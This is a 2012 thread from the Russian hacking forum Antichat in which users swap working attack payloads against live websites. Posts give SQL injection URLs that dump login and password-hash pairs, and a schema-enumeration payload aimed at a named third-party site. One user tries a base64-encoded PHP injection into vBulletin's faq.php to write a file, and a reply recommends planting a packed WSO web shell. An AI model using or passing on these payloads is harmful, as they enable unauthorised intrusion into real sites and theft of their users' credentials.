HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.02.2012, 01:13
Boolean
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748

Репутация: 78
По умолчанию

Цитата:
Сообщение от sl1k  
подскажите в чем пробл.
id=-983 GROUP BY 2 -- через group выяснил что 2 поля
но когда делаю
id=-983 UNION SELECT 1,2
все равно пишет что Query failed: The used SELECT statements have a different number of columns
пробуй UNION ALL SELECT 1,2
 
Ответить с цитированием

  #2  
Старый 02.02.2012, 01:20
sl1k
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме:
4819

Репутация: 0
По умолчанию

Цитата:
Сообщение от Boolean  
пробуй UNION ALL SELECT 1,2
результат тоже

c error based буду разбираться ибо новичок в sql пока
 
Ответить с цитированием

  #3  
Старый 02.02.2012, 05:17
Киев
Новичок
Регистрация: 09.08.2011
Сообщений: 19
Провел на форуме:
4744

Репутация: 4
По умолчанию

Такой вопрос

index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*

Таким запросом я могу просматривать хэши, меняя только значения limit,

а каким запросом можно перемаслать Юзверей?
 
Ответить с цитированием

  #4  
Старый 02.02.2012, 05:34
Юго
Познающий
Регистрация: 02.02.2011
Сообщений: 63
Провел на форуме:
13201

Репутация: 17
По умолчанию

Цитата:
Сообщение от Киев  
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?
Ты имеешь ввиду логины ?

ну например так

index.php?kat=2&kp=-39+union+select+concat_ws(0x2F,login,pass)+from+user+limit+0,1/*

вывод будет логин/хеш

или так

index.php?kat=2&kp=-39+union+select+concat(login,0x2F,pass)+from+user+limit+0,1/*

вывод будет такой же
 
Ответить с цитированием

  #5  
Старый 02.02.2012, 13:22
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от pirat0  
http://mastiff-dog.com/index.php?PageT=ReadNews&act=Empty&ID=-87
ребята прошу просто посмотреть есть ли тут инъекцыя??
В других параметрах

_http://mastiff-dog.com/index.php?PageT=ForSale&act=&CatID=-1+union+select+1,2,3,(select(@x)from(select(@x:=0x 00),(select(null)from(information_schema.columns)w here(table_schema!=0x696e666f726d6174696f6e5f73636 8656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table _schema,0x2e,table_name,0x3a,column_name))))x),5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4+--+
 
Ответить с цитированием

  #6  
Старый 02.02.2012, 15:23
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835

Репутация: 23
По умолчанию

пытаюсь создать файл

Powered by vBulletin® Version 3.8.5

file_put_contents('lala.php', '');

allow_url_include=Off

disable_functions=no value

magic_quotes_gpc=On

http://www.site.com/forum/faq.php?cmd=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=

выводит

Fatal error: Call to undefined function bas64_decode() in /var/www/site.com/forum/faq.php(329) : eval()'d code(1) : eval()'d code on line 1

что можно еще сделать?
 
Ответить с цитированием

  #7  
Старый 02.02.2012, 15:27
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

er9j6@

base64_decode
 
Ответить с цитированием

  #8  
Старый 02.02.2012, 15:39
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от Konqi  
er9j6@
base64_decode
http://www.site.com/forum/faq.php?cmd=base64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTsNCg==

все равно выводит

404 - Компонент не найден!
 
Ответить с цитированием

  #9  
Старый 02.02.2012, 15:43
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354

Репутация: 267


По умолчанию

2er9j6@,

vbulletin? Тогда смело ставь код пакованного WSO ~25kb. Потом лей как хочешь =)
 
Ответить с цитированием

  #10  
Старый 02.02.2012, 15:52
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от Ereee  
2er9j6@
,
vbulletin? Тогда смело ставь код пакованного WSO ~25kb. Потом лей как хочешь =)
а это как, научите?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.